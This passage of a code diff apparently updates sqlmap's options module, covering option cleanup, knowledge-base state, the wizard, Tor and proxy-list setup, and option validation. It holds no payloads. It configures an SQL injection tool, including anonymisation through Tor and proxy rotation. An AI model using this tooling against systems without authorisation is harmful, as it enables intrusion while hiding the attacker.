conf.csrfToken: + message = "provided value for option '--csrf-token' is a regular expression? [y/N] " + if not readInput(message, default='N', boolean=True): + conf.csrfToken = re.escape(conf.csrfToken) + except re.error: + conf.csrfToken = re.escape(conf.csrfToken) + finally: + class _(six.text_type): + pass + conf.csrfToken = _(conf.csrfToken) + conf.csrfToken._original = original + + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip) + + try: + re.compile(conf.testSkip) + except re.error: + conf.testSkip = re.escape(conf.testSkip) - if conf.timeSec not in kb.explicitSettings: + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE @@ -1385,40 +1890,47 @@ def _cleanupOptions(): warnMsg = "increasing default value for " warnMsg += "option '--time-sec' to %d because " % conf.timeSec warnMsg += "switch '--tor' was provided" - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE + if conf.retries: + conf.retries = min(conf.retries, MAX_CONNECT_RETRIES) + + if conf.url: + match = re.search(r"\A(\w+://)?([^/@?]+)@", conf.url) + if match: + credentials = match.group(2) + conf.url = conf.url.replace("%s@" % credentials, "", 1) + + conf.authType = AUTH_TYPE.BASIC + conf.authCred = credentials if ':' in credentials else "%s:" % credentials + if conf.code: conf.code = int(conf.code) if conf.csvDel: - conf.csvDel = conf.csvDel.decode("string_escape") # e.g. '\\t' -> '\t' + conf.csvDel = decodeStringEscape(conf.csvDel) - if conf.torPort and conf.torPort.isdigit(): + if conf.torPort and hasattr(conf.torPort, "isdigit") and conf.torPort.isdigit(): conf.torPort = int(conf.torPort) if conf.torType: conf.torType = conf.torType.upper() - if conf.oDir: - paths.SQLMAP_OUTPUT_PATH = conf.oDir - setPaths() + if conf.outputDir: + paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) + setPaths(paths.SQLMAP_ROOT_PATH) if conf.string: - try: - conf.string = conf.string.decode("unicode_escape") - except: - charset = string.whitespace.replace(" ", "") - for _ in charset: - conf.string = conf.string.replace(_.encode("string_escape"), _) + conf.string = decodeStringEscape(conf.string) if conf.getAll: - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) + for _ in WIZARD.ALL: + conf.__setitem__(_, True) if conf.noCast: - for _ in DUMP_REPLACEMENTS.keys(): - del DUMP_REPLACEMENTS[_] + DUMP_REPLACEMENTS.clear() if conf.dumpFormat: conf.dumpFormat = conf.dumpFormat.upper() @@ -1426,16 +1938,71 @@ def _cleanupOptions(): if conf.torType: conf.torType = conf.torType.upper() + if conf.col: + conf.col = re.sub(r"\s*,\s*", ',', conf.col) + + if conf.exclude: + regex = False + original = conf.exclude + + if any(_ in conf.exclude for _ in ('+', '*')): + try: + re.compile(conf.exclude) + except re.error: + pass + else: + regex = True + + if not regex: + conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude) + conf.exclude = r"\A%s\Z" % '|'.join(re.escape(_) for _ in conf.exclude.split(',')) + else: + conf.exclude = re.sub(r"(\w+)\$", r"\g<1>\$", conf.exclude) + + class _(six.text_type): + pass + + conf.exclude = _(conf.exclude) + conf.exclude._original = original + + if conf.binaryFields: + conf.binaryFields = conf.binaryFields.replace(" ", "") + conf.binaryFields = re.split(PARAMETER_SPLITTING_REGEX, conf.binaryFields) + + envProxy = max(os.environ.get(_, "") for _ in PROXY_ENVIRONMENT_VARIABLES) + if re.search(r"\A(https?|socks[45])://.+:\d+\Z", envProxy) and conf.proxy is None: + debugMsg = "using environment proxy '%s'" % envProxy + logger.debug(debugMsg) + + conf.proxy = envProxy + + if any((conf.proxy, conf.proxyFile, conf.tor)): + conf.disablePrecon = True + + if conf.dummy: + conf.batch = True + threadData = getCurrentThreadData() threadData.reset() -def _purgeOutput(): +def _cleanupEnvironment(): + """ + Cleanup environment (e.g. from leftovers after --shell). + """ + + if issubclass(_http_client.socket.socket, socks.socksocket): + socks.unwrapmodule(_http_client) + + if hasattr(socket, "_ready"): + socket._ready.clear() + +def _purge(): """ - Safely removes (purges) output directory. + Safely removes (purges) sqlmap data directory. """ - if conf.purgeOutput: - purge(paths.SQLMAP_OUTPUT_PATH) + if conf.purge: + purge(paths.SQLMAP_HOME_PATH) def _setConfAttributes(): """ @@ -1454,8 +2021,11 @@ def _setConfAttributes(): conf.dbmsHandler = None conf.dnsServer = None conf.dumpPath = None + conf.fileWriteType = None + conf.HARCollectorFactory = None conf.hashDB = None conf.hashDBFile = None + conf.httpCollector = None conf.httpHeaders = [] conf.hostname = None conf.ipv6 = False @@ -1465,12 +2035,12 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.resultsFilename = None + conf.proxyList = None conf.resultsFP = None conf.scheme = None conf.tests = [] + conf.tempDirs = [] conf.trafficFP = None - conf.wFileType = None def _setKnowledgeBaseAttributes(flushAll=True): """ @@ -1484,80 +2054,122 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.absFilePaths = set() kb.adjustTimeDelay = None kb.alerted = False + kb.aliasName = randomStr() kb.alwaysRefresh = None kb.arch = None kb.authHeader = None kb.bannerFp = AttribDict() + kb.base64Originals = {} + kb.binaryField = False + kb.browserVerification = None kb.brute = AttribDict({"tables": [], "columns": []}) kb.bruteMode = False kb.cache = AttribDict() - kb.cache.content = {} + kb.cache.addrinfo = {} + kb.cache.content = LRUDict(capacity=16) + kb.cache.comparison = {} + kb.cache.encoding = LRUDict(capacity=256) + kb.cache.alphaBoundaries = None + kb.cache.hashRegex = None + kb.cache.intBoundaries = None + kb.cache.parsedDbms = {} kb.cache.regex = {} kb.cache.stdev = {} + kb.captchaDetected = None + kb.chars = AttribDict() kb.chars.delimiter = randomStr(length=6, lowercase=True) - kb.chars.start = ":%s:" % randomStr(length=3, lowercase=True) - kb.chars.stop = ":%s:" % randomStr(length=3, lowercase=True) - kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = (":%s:" % _ for _ in randomStr(length=4, lowercase=True)) + kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) + kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True)) + kb.choices = AttribDict(keycheck=False) + kb.codePage = None kb.commonOutputs = None + kb.connErrorCounter = 0 + kb.copyExecTest = None kb.counters = {} + kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR kb.data = AttribDict() kb.dataOutputFlag = False # Active back-end DBMS fingerprint kb.dbms = None + kb.dbmsFilter = [] kb.dbmsVersion = [UNKNOWN_DBMS_VERSION] kb.delayCandidates = TIME_DELAY_CANDIDATES * [0] kb.dep = None + kb.disableHtmlDecoding = False + kb.disableShiftTable = False kb.dnsMode = False kb.dnsTest = None kb.docRoot = None + kb.droppingRequests = False + kb.dumpColumns = None kb.dumpTable = None + kb.dumpKeyboardInterrupt = False kb.dynamicMarkings = [] kb.dynamicParameter = False kb.endDetection = False kb.explicitSettings = set() + kb.extendTests = None + kb.errorChunkLength = None kb.errorIsNone = True + kb.falsePositives = [] kb.fileReadMode = False + kb.fingerprinted = False + kb.followSitemapRecursion = None kb.forcedDbms = None + kb.forcePartialUnion = False + kb.forceThreads = None + kb.forceWhere = None + kb.forkNote = None + kb.futileUnion = None + kb.fuzzUnionTest = None + kb.heavilyDynamic = False + kb.headersFile = None kb.headersFp = {} kb.heuristicDbms = None + kb.heuristicExtendedDbms = None + kb.heuristicCode = None + kb.heuristicMode = False + kb.heuristicPage = False kb.heuristicTest = None - kb.hintValue = None + kb.hintValue = "" kb.htmlFp = [] kb.httpErrorCodes = {} kb.inferenceMode = False kb.ignoreCasted = None kb.ignoreNotFound = False kb.ignoreTimeout = False + kb.identifiedWafs = set() kb.injection = InjectionDict() kb.injections = [] + kb.jsonAggMode = False + kb.laggingChecked = False kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "handlers", "hint", "identYwaf", "index", "io", "limit", "liveCookies", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None kb.maxConnectionsFlag = False kb.mergeCookies = None kb.multiThreadMode = False + kb.multipleCtrlC = False kb.negativeLogic = False + kb.nchar = True kb.nullConnection = None - kb.pageCompress = True - kb.pageTemplate = None - kb.pageTemplates = dict() - kb.postHint = None - kb.previousMethod = None - kb.processUserMarks = None + kb.oldMsf = None kb.orderByColumns = None kb.originalCode = None kb.originalPage = None + kb.originalPageTime = None kb.originalTimeDelay = None kb.originalUrls = dict() @@ -1567,49 +2179,82 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.osVersion = None kb.osSP = None + kb.pageCompress = True + kb.pageTemplate = None + kb.pageTemplates = dict() kb.pageEncoding = DEFAULT_PAGE_ENCODING kb.pageStable = None kb.partRun = None kb.permissionFlag = False + kb.place = None + kb.postHint = None + kb.postSpaceToPlus = False + kb.postUrlEncode = True kb.prependFlag = False kb.processResponseCounter = 0 + kb.previousMethod = None + kb.processNonCustom = None + kb.processUserMarks = None + kb.proxies = None kb.proxyAuthHeader = None kb.queryCounter = 0 - kb.redirectChoice = None - kb.redirectSetCookie = None + kb.randomPool = {} kb.reflectiveMechanism = True kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} kb.requestCounter = 0 kb.resendPostOnRedirect = None - kb.responseTimes = [] + kb.resolutionDbms = None + kb.responseTimes = {} + kb.responseTimeMode = None + kb.responseTimePayload = None kb.resumeValues = True kb.safeCharEncode = False + kb.safeReq = AttribDict() + kb.secondReq = None + kb.serverHeader = None kb.singleLogFlags = set() - kb.skipOthersDbms = None - kb.postSpaceToPlus = False + kb.skipSeqMatcher = False + kb.smokeMode = False + kb.reduceTests = None + kb.sslSuccess = False + kb.startTime = time.time() kb.stickyDBMS = False - kb.stickyLevel = None kb.suppressResumeInfo = False + kb.tableFrom = None kb.technique = None + kb.tempDir = None kb.testMode = False + kb.testOnlyCustom = False kb.testQueryCount = 0 + kb.testType = None kb.threadContinue = True kb.threadException = False - kb.timeValidCharsRun = 0 kb.uChar = NULL + kb.udfFail = False kb.unionDuplicates = False + kb.unionTemplate = None + kb.webSocketRecvCount = None + kb.wizardMode = False kb.xpCmdshellAvailable = False if flushAll: + kb.checkSitemap = None kb.headerPaths = {} kb.keywords = set(getFileItems(paths.SQL_KEYWORDS)) + kb.lastCtrlCTime = None + kb.normalizeCrawlingChoice = None kb.passwordMgr = None + kb.postprocessFunctions = [] + kb.preprocessFunctions = [] + kb.skipVulnHost = None + kb.storeCrawlingChoice = None kb.tamperFunctions = [] - kb.targets = oset() + kb.targets = OrderedSet() kb.testedParams = set() kb.userAgents = None kb.vainRun = True kb.vulnHosts = set() + kb.wafFunctions = [] kb.wordlists = None def _useWizardInterface(): @@ -1622,25 +2267,20 @@ def _useWizardInterface(): logger.info("starting wizard interface") - while True: - while not conf.url: - message = "Please enter full target URL (-u): " - conf.url = readInput(message, default=None) - - message = "POST data (--data) [Enter for None]: " - conf.data = readInput(message, default=None) + while not conf.url: + message = "Please enter full target URL (-u): " + conf.url = readInput(message, default=None, checkBatch=False) - if filter(lambda x: '=' in str(x), [conf.url, conf.data]) or '*' in conf.url: - break - else: - warnMsg = "no GET and/or POST parameter(s) found for testing " - warnMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')" - logger.critical(warnMsg) + message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + conf.data = readInput(message, default=None) - if conf.crawlDepth or conf.forms: - break - else: - conf.url = conf.data = None + if not (any('=' in _ for _ in (conf.url, conf.data)) or '*' in conf.url): + warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else None) or HTTPMETHOD.POST) + warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). " + if not conf.crawlDepth and not conf.forms: + warnMsg += "Will search for forms" + conf.forms = True + logger.warning(warnMsg) choice = None @@ -1664,15 +2304,18 @@ def _useWizardInterface(): while choice is None or choice not in ("", "1", "2", "3"): message = "Enumeration (--banner/--current-user/etc). Please choose:\n" - message += "[1] Basic (default)\n[2] Smart\n[3] All" + message += "[1] Basic (default)\n[2] Intermediate\n[3] All" choice = readInput(message, default='1') if choice == '2': - map(lambda x: conf.__setitem__(x, True), WIZARD.SMART) + options = WIZARD.INTERMEDIATE elif choice == '3': - map(lambda x: conf.__setitem__(x, True), WIZARD.ALL) + options = WIZARD.ALL else: - map(lambda x: conf.__setitem__(x, True), WIZARD.BASIC) + options = WIZARD.BASIC + + for _ in options: + conf.__setitem__(_, True) logger.debug("muting sqlmap.. it will do the magic for you") conf.verbose = 0 @@ -1682,60 +2325,23 @@ def _useWizardInterface(): dataToStdout("\nsqlmap is running, please wait..\n\n") -def _saveCmdline(): + kb.wizardMode = True + +def _saveConfig(): """ - Saves the command line options on a sqlmap configuration INI file + Saves the command line options to a sqlmap configuration INI file Format. """ - if not conf.saveCmdline: + if not conf.saveConfig: return - debugMsg = "saving command line options on a sqlmap configuration INI file" + debugMsg = "saving command line options to a sqlmap configuration INI file" logger.debug(debugMsg) - config = UnicodeRawConfigParser() - userOpts = {} - - for family in optDict.keys(): - userOpts[family] = [] - - for option, value in conf.items(): - for family, optionData in optDict.items(): - if option in optionData: - userOpts[family].append((option, value, optionData[option])) - - for family, optionData in userOpts.items(): - config.add_section(family) - - optionData.sort() - - for option, value, datatype in optionData: - if datatype and isListLike(datatype): - datatype = datatype[0] + saveConfig(conf, conf.saveConfig) - if value is None: - if datatype == "boolean": - value = "False" - elif datatype in ("integer", "float"): - if option in ("threads", "verbose"): - value = "1" - elif option == "timeout": - value = "10" - else: - value = "0" - elif datatype == "string": - value = "" - - if isinstance(value, basestring): - value = value.replace("\n", "\n ") - - config.set(family, option, value) - - confFP = openFile(paths.SQLMAP_CONFIG, "wb") - config.write(confFP) - - infoMsg = "saved command line options on '%s' configuration file" % paths.SQLMAP_CONFIG + infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig logger.info(infoMsg) def setVerbosity(): @@ -1764,6 +2370,43 @@ def setVerbosity(): elif conf.verbose >= 5: logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN) +def _normalizeOptions(inputOptions): + """ + Sets proper option types + """ + + types_ = {} + for group in optDict.keys(): + types_.update(optDict[group]) + + for key in inputOptions: + if key in types_: + value = inputOptions[key] + if value is None: + continue + + type_ = types_[key] + if type_ and isinstance(type_, tuple): + type_ = type_[0] + + if type_ == OPTION_TYPE.BOOLEAN: + try: + value = bool(value) + except (TypeError, ValueError): + value = False + elif type_ == OPTION_TYPE.INTEGER: + try: + value = int(value) + except (TypeError, ValueError): + value = 0 + elif type_ == OPTION_TYPE.FLOAT: + try: + value = float(value) + except (TypeError, ValueError): + value = 0.0 + + inputOptions[key] = value + def _mergeOptions(inputOptions, overrideOptions): """ Merge command line options with configuration file and default options. @@ -1772,9 +2415,6 @@ def _mergeOptions(inputOptions, overrideOptions): @type inputOptions: C{instance} """ - if inputOptions.pickledOptions: - inputOptions = base64unpickle(inputOptions.pickledOptions) - if inputOptions.configFile: configFileParser(inputOptions.configFile) @@ -1787,14 +2427,40 @@ def _mergeOptions(inputOptions, overrideOptions): if key not in conf or value not in (None, False) or overrideOptions: conf[key] = value - for key, value in conf.items(): - if value is not None: - kb.explicitSettings.add(key) + if not conf.api: + for key, value in conf.items(): + if value is not None: + kb.explicitSettings.add(key) for key, value in defaults.items(): if hasattr(conf, key) and conf[key] is None: conf[key] = value + if conf.unstable: + if key in ("timeSec", "retries", "timeout"): + conf[key] *= 2 + + if conf.unstable: + conf.forcePartial = True + + lut = {} + for group in optDict.keys(): + lut.update((_.upper(), _) for _ in optDict[group]) + + envOptions = {} + for key, value in os.environ.items(): + if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX): + _ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper() + if _ in lut: + envOptions[lut[_]] = value + + if envOptions: + _normalizeOptions(envOptions) + for key, value in envOptions.items(): + conf[key] = value + + mergedOptions.update(conf) + def _setTrafficOutputFP(): if conf.trafficFile: infoMsg = "setting file for logging HTTP traffic" @@ -1802,8 +2468,14 @@ def _setTrafficOutputFP(): conf.trafficFP = openFile(conf.trafficFile, "w+") +def _setupHTTPCollector(): + if not conf.harFile: + return + + conf.httpCollector = HTTPCollectorFactory(conf.harFile).create() + def _setDNSServer(): - if not conf.dnsName: + if not conf.dnsDomain: return infoMsg = "setting up DNS server instance" @@ -1815,9 +2487,9 @@ def _setDNSServer(): try: conf.dnsServer = DNSServer() conf.dnsServer.run() - except socket.error, msg: + except socket.error as ex: errMsg = "there was an error while setting up " - errMsg += "DNS server instance ('%s')" % msg + errMsg += "DNS server instance ('%s')" % getSafeExString(ex) raise SqlmapGenericException(errMsg) else: errMsg = "you need to run sqlmap as an administrator " @@ -1826,6 +2498,15 @@ def _setDNSServer(): errMsg += "for incoming address resolution attempts" raise SqlmapMissingPrivileges(errMsg) +def _setProxyList(): + if not conf.proxyFile: + return + + conf.proxyList = [] + for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)): + _, type_, address, port = match.groups() + conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port)) + def _setTorProxySettings(): if not conf.tor: return @@ -1839,50 +2520,65 @@ def _setTorHttpProxySettings(): infoMsg = "setting Tor HTTP proxy settings" logger.info(infoMsg) - found = None - - for port in (DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)): - try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((LOCALHOST, port)) - found = port - break - except socket.error: - pass - - s.close() + port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,)) - if found: - conf.proxy = "http://%s:%d" % (LOCALHOST, found) + if port: + conf.proxy = "http://%s:%d" % (LOCALHOST, port) else: - errMsg = "can't establish connection with the Tor proxy. " - errMsg += "Please make sure that you have Vidalia, Privoxy or " - errMsg += "Polipo bundle installed for you to be able to " - errMsg += "successfully use switch '--tor' " - - if IS_WIN: - errMsg += "(e.g. https://www.torproject.org/projects/vidalia.html.en)" - else: - errMsg += "(e.g. http://www.coresec.org/2011/04/24/sqlmap-with-tor/)" - + errMsg = "can't establish connection with the Tor HTTP proxy. " + errMsg += "Please make sure that you have Tor (bundle) installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " raise SqlmapConnectionException(errMsg) if not conf.checkTor: warnMsg = "use switch '--check-tor' at " - warnMsg += "your own convenience when using " - warnMsg += "HTTP proxy type (option '--tor-type') " - warnMsg += "for accessing Tor anonymizing network because of " + warnMsg += "your own convenience when accessing " + warnMsg += "Tor anonymizing network because of " warnMsg += "known issues with default settings of various 'bundles' " warnMsg += "(e.g. Vidalia)" - logger.warn(warnMsg) + logger.warning(warnMsg) def _setTorSocksProxySettings(): infoMsg = "setting Tor SOCKS proxy settings" logger.info(infoMsg) - # Has to be SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, conf.torPort or DEFAULT_TOR_SOCKS_PORT) - socks.wrapmodule(urllib2) + port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,)) + + if not port: + errMsg = "can't establish connection with the Tor SOCKS proxy. " + errMsg += "Please make sure that you have Tor service installed and setup " + errMsg += "so you could be able to successfully use switch '--tor' " + raise SqlmapConnectionException(errMsg) + + # SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29) + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port) + socks.wrapmodule(_http_client) + +def _setHttpOptions(): + if conf.chunked and conf.data: + if hasattr(_http_client.HTTPConnection, "_set_content_length"): + _http_client.HTTPConnection._set_content_length = lambda self, *args, **kwargs: None + else: + def putheader(self, header, *values): + if header != HTTP_HEADER.CONTENT_LENGTH: + self._putheader(header, *values) + + if not hasattr(_http_client.HTTPConnection, "_putheader"): + _http_client.HTTPConnection._putheader = _http_client.HTTPConnection.putheader + + _http_client.HTTPConnection.putheader = putheader + + if conf.http10: + _http_client.HTTPConnection._http_vsn = 10 + _http_client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + + if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")): + try: + from websocket import ABNF + except ImportError: + errMsg = "sqlmap requires third-party module 'websocket-client' " + errMsg += "in order to use WebSocket functionality" + raise SqlmapMissingDependence(errMsg) def _checkTor(): if not conf.checkTor: @@ -1891,9 +2587,14 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) - if not page or 'Congratulations' not in page: - errMsg = "it seems that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/api/ip", raise404=False) + tor_status = json.loads(page) + except (SqlmapConnectionException, TypeError, ValueError): + tor_status = None + + if not tor_status or not tor_status.get("IsTor"): + errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) else: infoMsg = "Tor is properly being used" @@ -1908,36 +2609,73 @@ def _basicOptionValidation(): errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)" raise SqlmapSyntaxException(errMsg) - if conf.level is not None and not (isinstance(conf.level, int) and conf.level > 0): - errMsg = "value for option '--level' must be an integer value greater than zero (>0)" + if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5): + errMsg = "value for option '--level' must be an integer value from range [1, 5]" raise SqlmapSyntaxException(errMsg) - if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk > 0): - errMsg = "value for option '--risk' must be an integer value greater than zero (>0)" + if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3): + errMsg = "value for option '--risk' must be an integer value from range [1, 3]" raise SqlmapSyntaxException(errMsg) - if conf.limitStart is not None and isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ - conf.limitStop is not None and isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: - errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option" - raise SqlmapSyntaxException(errMsg) + if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \ + isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart: + warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable" + logger.warning(warnMsg) - if conf.firstChar is not None and isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ - conf.lastChar is not None and isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: + if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \ + isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar: errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option" raise SqlmapSyntaxException(errMsg) - if conf.cpuThrottle is not None and isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0): - errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]" - raise SqlmapSyntaxException(errMsg) + if conf.proxyFile and not any((conf.randomAgent, conf.mobile, conf.agent, conf.requestFile)): + warnMsg = "usage of switch '--random-agent' is strongly recommended when " + warnMsg += "using option '--proxy-file'" + logger.warning(warnMsg) if conf.textOnly and conf.nullConnection: errMsg = "switch '--text-only' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.uValues and conf.uChar: + errMsg = "option '--union-values' is incompatible with option '--union-char'" + raise SqlmapSyntaxException(errMsg) + + if conf.base64Parameter and conf.tamper: + errMsg = "option '--base64' is incompatible with option '--tamper'" + raise SqlmapSyntaxException(errMsg) + + if conf.eta and conf.verbose > defaults.verbose: + errMsg = "switch '--eta' is incompatible with option '-v'" + raise SqlmapSyntaxException(errMsg) + + if conf.secondUrl and conf.secondReq: + errMsg = "option '--second-url' is incompatible with option '--second-req')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.url: + errMsg = "option '-d' is incompatible with option '-u' ('--url')" + raise SqlmapSyntaxException(errMsg) + + if conf.direct and conf.dbms: + errMsg = "option '-d' is incompatible with option '--dbms'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.dumpTable and conf.search: + errMsg = "switch '--dump' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + + if conf.chunked and not any((conf.data, conf.requestFile, conf.forms)): + errMsg = "switch '--chunked' requires usage of (POST) options/switches '--data', '-r' or '--forms'" + raise SqlmapSyntaxException(errMsg) + + if conf.api and not conf.configFile: + errMsg = "switch '--api' requires usage of option '-c'" + raise SqlmapSyntaxException(errMsg) + if conf.data and conf.nullConnection: errMsg = "option '--data' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) @@ -1950,6 +2688,25 @@ def _basicOptionValidation(): errMsg = "option '--not-string' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.tor and conf.osPwn: + errMsg = "option '--tor' is incompatible with switch '--os-pwn'" + raise SqlmapSyntaxException(errMsg) + + if conf.noCast and conf.hexConvert: + errMsg = "switch '--no-cast' is incompatible with switch '--hex'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlDepth: + try: + xrange(conf.crawlDepth) + except OverflowError as ex: + errMsg = "invalid value used for option '--crawl' ('%s')" % getSafeExString(ex) + raise SqlmapSyntaxException(errMsg) + + if conf.dumpAll and conf.search: + errMsg = "switch '--dump-all' is incompatible with switch '--search'" + raise SqlmapSyntaxException(errMsg) + if conf.string and conf.notString: errMsg = "option '--string' is incompatible with switch '--not-string'" raise SqlmapSyntaxException(errMsg) @@ -1958,6 +2715,56 @@ def _basicOptionValidation(): errMsg = "option '--regexp' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) + if conf.regexp: + try: + re.compile(conf.regexp) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.paramExclude: + if re.search(r"\A\w+,", conf.paramExclude): + conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(','))) + + try: + re.compile(conf.paramExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.paramExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retryOn: + try: + re.compile(conf.retryOn) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.retryOn, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.retries == defaults.retries: + conf.retries = 5 * conf.retries + + warnMsg = "increasing default value for " + warnMsg += "option '--retries' to %d because " % conf.retries + warnMsg += "option '--retry-on' was provided" + logger.warning(warnMsg) + + if conf.cookieDel and len(conf.cookieDel) != 1: + errMsg = "option '--cookie-del' should contain a single character (e.g. ';')" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude: + try: + re.compile(conf.crawlExclude) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + + if conf.scope: + try: + re.compile(conf.scope) + except Exception as ex: + errMsg = "invalid regular expression '%s' ('%s')" % (conf.scope, getSafeExString(ex)) + raise SqlmapSyntaxException(errMsg) + if conf.dumpTable and conf.dumpAll: errMsg = "switch '--dump' is incompatible with switch '--dump-all'" raise SqlmapSyntaxException(errMsg) @@ -1966,16 +2773,60 @@ def _basicOptionValidation(): errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'" raise SqlmapSyntaxException(errMsg) - if conf.threads > MAX_NUMBER_OF_THREADS: + if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"): errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS raise SqlmapSyntaxException(errMsg) - if conf.forms and not any((conf.url, conf.bulkFile)): - errMsg = "switch '--forms' requires usage of option '-u' (--url) or '-m'" + if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile)): + errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g' or '-m'" + raise SqlmapSyntaxException(errMsg) + + if conf.crawlExclude and not conf.crawlDepth: + errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'" + raise SqlmapSyntaxException(errMsg) + + if conf.safePost and not conf.safeUrl: + errMsg = "option '--safe-post' requires usage of option '--safe-url'" + raise 